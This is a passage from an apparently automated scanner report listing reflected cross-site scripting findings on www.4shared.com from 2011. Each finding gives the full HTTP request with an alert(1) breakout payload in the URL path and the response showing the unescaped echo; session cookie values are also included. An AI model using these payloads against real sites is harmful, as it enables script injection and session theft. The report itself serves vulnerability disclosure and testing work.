Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35131
Date: Fri, 29 Jul 2011 13:59:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<input type="hidden" name="au" value="1e5bd7"style="x:expression(alert(1))"10739e700ef"/>
...[SNIP]...

2.22. http://www.4shared.com/enterprise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3894c"-alert(1)-"c12c2b26d35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /enterprise3894c"-alert(1)-"c12c2b26d35/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /enterprise3894c"-alert(1)-"c12c2b26d35/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:40 GMT
Content-Length: 38814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enterprise3894c"-alert(1)-"c12c2b26d35/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.23. http://www.4shared.com/enterprise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c277'-alert(1)-'845e0f33c14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /enterprise4c277'-alert(1)-'845e0f33c14/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /enterprise4c277'-alert(1)-'845e0f33c14/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:42 GMT
Content-Length: 38815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/enterprise4c277'-alert(1)-'845e0f33c14/',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.24. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4fc2'-alert(1)-'c41a99863bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icof4fc2'-alert(1)-'c41a99863bc HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /favicon.icof4fc2'-alert(1)-'c41a99863bc
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:37 GMT
Content-Length: 38774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.icof4fc2'-alert(1)-'c41a99863bc',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.25. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f195b"-alert(1)-"6b92c01de75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icof195b"-alert(1)-"6b92c01de75 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /favicon.icof195b"-alert(1)-"6b92c01de75
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:35 GMT
Content-Length: 38597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.icof195b"-alert(1)-"6b92c01de75";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.26. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52e34'-alert(1)-'13a44c1832a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:50 GMT
Content-Length: 38843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons52e34'-alert(1)-'13a44c1832a/16x16/doc.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.27. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63ec5"-alert(1)-"465cf6cad14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons63ec5"-alert(1)-"465cf6cad14/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons63ec5"-alert(1)-"465cf6cad14/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:34 GMT
Content-Length: 38664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons63ec5"-alert(1)-"465cf6cad14/16x16/doc.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.28. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d7a'-alert(1)-'1820722bad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:20 GMT
Content-Length: 38846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16f3d7a'-alert(1)-'1820722bad5/doc.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.29. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f2f"-alert(1)-"0980582323e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x1641f2f"-alert(1)-"0980582323e/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x1641f2f"-alert(1)-"0980582323e/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:18 GMT
Content-Length: 38847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1641f2f"-alert(1)-"0980582323e/doc.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.30. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c57'-alert(1)-'713458ffaa1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:40 GMT
Content-Length: 38668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/doc.gif38c57'-alert(1)-'713458ffaa1',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.31. http://www.4shared.com/icons/16x16/doc.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73494"-alert(1)-"fc552754d84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/doc.gif73494"-alert(1)-"fc552754d84 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif73494"-alert(1)-"fc552754d84
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:38 GMT
Content-Length: 38665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/doc.gif73494"-alert(1)-"fc552754d84";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.32. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d1d"-alert(1)-"62c133ebe14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iconsa9d1d"-alert(1)-"62c133ebe14/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /iconsa9d1d"-alert(1)-"62c133ebe14/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:18 GMT
Content-Length: 38846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
